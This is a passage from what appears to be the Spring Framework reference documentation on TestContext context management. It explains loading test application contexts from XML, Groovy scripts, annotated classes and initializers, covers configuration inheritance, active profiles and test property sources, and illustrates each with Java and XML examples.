body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an `ApplicationContext` for your tests using Groovy scripts that utilize the\n<<core.adoc#groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. Resource lookup semantics for\nGroovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML\nconfiguration files>>.\n\n\n.Enabling Groovy script support\n[TIP]\n====\nSupport for using Groovy scripts to load an `ApplicationContext` in the Spring\nTestContext Framework is enabled automatically if Groovy is on the classpath.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/AppConfig.groovy\" and\n\t\/\/ \"\/TestConfig.groovy\" in the root of the classpath\n\t**@ContextConfiguration({\"\/AppConfig.groovy\", \"\/TestConfig.Groovy\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default Groovy script.\nSpecifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`\ndetect a default location based on the name of the test class. If your class is named\n`com.example.MyTest`, the Groovy context loader will load your application context from\n`\"classpath:com\/example\/MyTestContext.groovy\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTestContext.groovy\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Declaring XML config and Groovy scripts simultaneously\n[TIP]\n====\nBoth XML configuration files and Groovy scripts can be declared simultaneously via the\n`locations` or `value` attribute of `@ContextConfiguration`. If the path to a configured\nresource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;\notherwise it will be loaded using a `GroovyBeanDefinitionReader`.\n\nThe following listing demonstrates how to combine both in an integration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"\/app-config.xml\" and \"\/TestConfig.groovy\"\n\t@ContextConfiguration({ \"\/app-config.xml\", \"\/TestConfig.groovy\" })\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n====\n\n[[testcontext-ctx-management-javaconfig]]\n===== Context configuration with annotated classes\n\nTo load an `ApplicationContext` for your tests using __annotated classes__ (see\n<<core.adoc#beans-java, Java-based container configuration>>),\nannotate your test class with `@ContextConfiguration` and configure the\n`classes` attribute with an array that contains references to annotated classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from AppConfig and TestConfig\n\t**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Annotated Classes\n[TIP]\n====\nThe term __annotated class__ can refer to any of the following.\n\n* A class annotated with `@Configuration`\n* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)\n* A JSR-330 compliant class that is annotated with `javax.inject` annotations\n* Any other class that contains `@Bean`-methods\n\nConsult the javadocs of `@Configuration` and `@Bean` for further information regarding\nthe configuration and semantics of __annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. For further information, refer to the\ncorresponding javadocs.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden programmatically via a custom resolver\n\t@ActiveProfiles(\n\t\tresolver = OperatingSystemActiveProfilesResolver.class,\n\t\tinheritProfiles = false)\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service.test;\n\n\tpublic class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {\n\n\t\t@Override\n\t\tString[] resolve(Class<?> testClass) {\n\t\t\tString profile = ...;\n\t\t\t\/\/ determine the value of profile based on the operating system\n\t\t\treturn new String[] {profile};\n\t\t}\n\t}\n----\n\n[[testcontext-ctx-management-property-sources]]\n===== Context configuration with test property sources\n\nSpring 3.1 introduced first-class support in the framework for the notion of an\nenvironment with a hierarchy of _property sources_, and since Spring 4.1 integration\ntests can be configured with test-specific property sources. In contrast to the\n`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`\nannotation can be declared on a test class to declare resource locations for test\nproperties files or _inlined_ properties. These test property sources will be added to\nthe set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded\nfor the annotated integration test.\n\n[NOTE]\n====\n`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`\nSPI, but `@TestPropertySource` is not supported with implementations of the older\n`ContextLoader` SPI.\n\nImplementations of `SmartContextLoader` gain access to merged test property source values\nvia the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in\n`MergedContextConfiguration`.\n====\n\n*Declaring test property sources*\n\nTest properties files can be configured via the `locations` or `value` attribute of\n`@TestPropertySource` as shown in the following example.\n\nBoth traditional and XML-based properties file formats are supported -- for example,\n`\"classpath:\/com\/example\/test.properties\"` or `\"file:\/\/\/path\/to\/file.xml\"`.\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"test.properties\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/test.xml\"`. A path which\nreferences a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will\nbe loaded using the specified resource protocol. Resource location wildcards (e.g.\n`**\/*.properties`) are not permitted: each location must evaluate to exactly one\n`.properties` or `.xml` resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n_Inlined_ properties in the form of key-value pairs can be configured via the\n`properties` attribute of `@TestPropertySource` as shown in the following example. All\nkey-value pairs will be added to the enclosing `Environment` as a single test\n`PropertySource` with the highest precedence.\n\nThe supported syntax for key-value pairs is the same as the syntax defined for entries in\na Java properties file:\n\n* `\"key=value\"`\n* `\"key:value\"`\n* `\"key value\"`\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(properties = {\"timezone = GMT\", \"port: 4242\"})\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Default properties file detection*\n\nIf `@TestPropertySource` is declared as an empty annotation (i.e., without explicit\nvalues for the `locations` or `properties` attributes), an attempt will be made to detect\na _default_ properties file relative to the class that declared the annotation. For\nexample, if the annotated test class is `com.example.MyTest`, the corresponding default\nproperties file is `\"classpath:com\/example\/MyTest.properties\"`. If the default cannot be\ndetected, an `IllegalStateException` will be thrown.\n\n*Precedence*\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nIn the following example, the `timezone` and `port` properties as well as any properties\ndefined in `\"\/test.properties\"` will override any properties of the same name that are\ndefined in system and application property sources. Furthermore, if the\n`\"\/test.properties\"` file defines entries for the `timezone` and `port` properties those\nwill be overridden by the _inlined_ properties declared via the `properties` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\n\t\tlocations = \"\/test.properties\",\n\t\tproperties = {\"timezone = GMT\", \"port: 4242\"}\n\t)\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class 